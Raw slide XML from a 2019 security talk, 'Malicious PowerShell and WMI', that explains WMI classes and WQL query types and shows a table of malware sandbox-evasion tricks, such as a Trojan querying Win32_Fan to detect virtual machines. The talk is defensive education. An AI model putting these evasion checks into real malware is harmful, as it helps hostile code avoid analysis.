          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>@browninfosecguy</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10052723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FC5CB3-A78D-274B-AD2A-38ED329791F1}" type="datetime1">
              <a:rPr lang="en-CA" smtClean="0"/>
              <a:t>2019-04-29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>@browninfosecguy</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40553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66A4A76-2C6B-7E4B-9235-629AC1B2886D}" type="datetime1">
              <a:rPr lang="en-CA" smtClean="0"/>
              <a:t>2019-04-29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>@browninfosecguy</a:t>
            </a:r>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269605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AF1A799-0CBD-A847-BEB2-9C3EF3898E1F}" type="datetime1">
              <a:rPr lang="en-CA" smtClean="0"/>
              <a:t>2019-04-29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>@browninfosecguy</a:t>
            </a:r>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82016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CC8D07-467D-CF4C-8ABF-010CAAC457C8}" type="datetime1">
              <a:rPr lang="en-CA" smtClean="0"/>
              <a:t>2019-04-29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>@browninfosecguy</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636053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1B6870-AD86-AA46-9B5F-AD6153244961}" type="datetime1">
              <a:rPr lang="en-CA" smtClean="0"/>
              <a:t>2019-04-29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>@browninfosecguy</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187062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EFCB51-73B0-3F42-BFF9-C5BC416B51CC}" type="datetime1">
              <a:rPr lang="en-CA" smtClean="0"/>
              <a:t>2019-04-29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>@browninfosecguy</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008808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BA0494-766E-4840-8DCD-11621DC9E89C}" type="datetime1">
              <a:rPr lang="en-CA" smtClean="0"/>
              <a:t>2019-04-29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>@browninfosecguy</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74279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B6A7E0-204B-2B42-8141-46991E28B9C9}" type="datetime1">
              <a:rPr lang="en-CA" smtClean="0"/>
              <a:t>2019-04-29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>@browninfosecguy</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0161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D8B69A1-0A71-A944-822F-2C59CD98E768}" type="datetime1">
              <a:rPr lang="en-CA" smtClean="0"/>
              <a:t>2019-04-29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Footer Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>@browninfosecguy</a:t>
            </a:r>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082054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C273C5A-9BC8-9343-B96A-386F675BC8AE}" type="datetime1">
              <a:rPr lang="en-CA" smtClean="0"/>
              <a:t>2019-04-29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>@browninfosecguy</a:t>
            </a:r>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95662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A888DE-CE12-FD4C-9C58-B3F570BCEAB4}" type="datetime1">
              <a:rPr lang="en-CA" smtClean="0"/>
              <a:t>2019-04-29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>@browninfosecguy</a:t>
            </a:r>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84141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774918-602C-594C-A8E9-7FB5B62E3878}" type="datetime1">
              <a:rPr lang="en-CA" smtClean="0"/>
              <a:t>2019-04-29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>@browninfosecguy</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069401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AE6C21B-EA30-3F43-9F96-A567C37721B4}" type="datetime1">
              <a:rPr lang="en-CA" smtClean="0"/>
              <a:t>2019-04-29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>@browninfosecguy</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794255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FB097F8-EFFB-D14F-BC20-178D98B262D3}" type="datetime1">
              <a:rPr lang="en-CA" smtClean="0"/>
              <a:t>2019-04-29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dirty="0"/>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>browninfosecguy</a:t>
            </a:r>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376098732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soft.com/en-us/windows/desktop/cimwin32prov/win32-fan"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hyperlink" Target="https://www.malware-traffic-analysis.net/index.html" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.irongeek.com/i.php?page=videos/derbycon8/track-3-03-detecting-wmi-exploitation-michael-gough" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.symantec.com/blogs/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securelist.com/all/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research.html" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/jsnover" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blogs.msdn.microsoft.com/powershell/2017/11/02/powershell-constrained-language-mode/" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/concentrateddon"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twitter.com/browninfosecguy" TargetMode="Externa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p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0">
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Malicious PowerShell and WMI</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E78725B-6E40-4D82-B375-7831D81C29EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Sunny Jamwal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="24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19359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69878"/>
            <a:ext cx="9905998" cy="1478570"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>WMI</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4787901" y="1200150"/>
            <a:ext cx="6451039" cy="4623875"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>WMI organize system information in a hierarchal manner.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Namespace:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Example root\CIMv2, root\SecurityCentre2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Classes:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Example WIN32_LogicalDisk, WIN32_TapeDrive, WIN32_BIOS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Instance</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> of a class represent real world occurrence of something.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example 1: Instance of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>WIN32_TapeDrive represents occurrence of tape drive.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>Example 2: Instances of Win32_Process represents current processes running on the system.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7D628ED-AD64-0045-87F8-2C675A5F3895}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="953060" y="1200150"/>
            <a:ext cx="3585230" cy="4384724"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4272333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69878"/>
            <a:ext cx="9905998" cy="1478570"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>WQL : WMI Query Language</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4006851" y="1200150"/>
            <a:ext cx="7232089" cy="4623875"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" sz="2400" dirty="0"/>
              <a:t>WMI Query Types</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="2400" dirty="0"/>
              <a:t>1. Data Queries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" sz="2400" dirty="0"/>
              <a:t>Data queries are used to retrieve class instances</a:t>
            </a:r>
            <a:endParaRPr lang="fr" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="2400" dirty="0"/>
              <a:t>2. Event Queries </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" sz="2400" dirty="0"/>
              <a:t>The event queries are used to create WMI event subscriptions. </a:t>
            </a:r>
            <a:endParaRPr lang="fr" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="2400" dirty="0"/>
              <a:t>3. Schema Queries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" sz="2400" dirty="0"/>
              <a:t>Schema queries are used to retrieve class definitions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11E7F5DF-408C-F546-ACA5-88F7670883E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="953060" y="1200150"/>
            <a:ext cx="2863850" cy="4089302"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3244136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blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="21" presetID="3" presetClass="entr" presetSubtype="1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blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="5" end="5"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="29" presetID="3" presetClass="entr" presetSubtype="10"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blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="3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161318"/>
            <a:ext cx="9905998" cy="753082"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>WMI</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="9" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF6AB241-BFCD-C044-A2A3-581FDAF31628}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="247696519"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1066800" y="914400"/>
          <a:ext cx="10058400" cy="5244083"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{69C7853C-536D-4A76-A0AE-DD22124D55A5}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1837591">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="918342840"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="8220809">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="50297602"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="287133">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr" fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="en-CA" sz="1400" b="1" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Evasion Technique</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="31270" marR="31270" marT="15635" marB="15635"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr" fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="en-CA" sz="1400" b="1" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Description</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="31270" marR="31270" marT="15635" marB="15635"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1168742577"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="970524">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr" fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="en-CA" sz="1100" b="1" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Fan Check</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="31270" marR="31270" marT="15635" marB="15635" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="en-CA" sz="1100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>The Trojan will perform the following WMI query:</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="en-CA" sz="1100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="en-CA" sz="1400" b="1" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Select * from Win32_Fan</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="en-CA" sz="1100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="en-CA" sz="1100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>According to </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-CA" sz="1100" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:hlinkClick r:id="rId3"/>
                        </a:rPr>
                        <a:t>MSDN</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-CA" sz="1100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>, this query should return a class that provides statistics on the CPU fan. The Trojan checks to see if the result of this query returned a class with more than 0 elements, which would most likely be true in a non-virtual environment.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-CA" sz="1100" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="3A464E"/>
                        </a:solidFill>
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="31270" marR="31270" marT="15635" marB="15635"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1554279621"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="970524">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr" fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="en-CA" sz="1100" b="1" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Temperature Check</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="31270" marR="31270" marT="15635" marB="15635" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="en-CA" sz="1100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>The Trojan will perform the following WMI query:</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="en-CA" sz="1100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr fontAlgn="t"/>
                      <a:r>
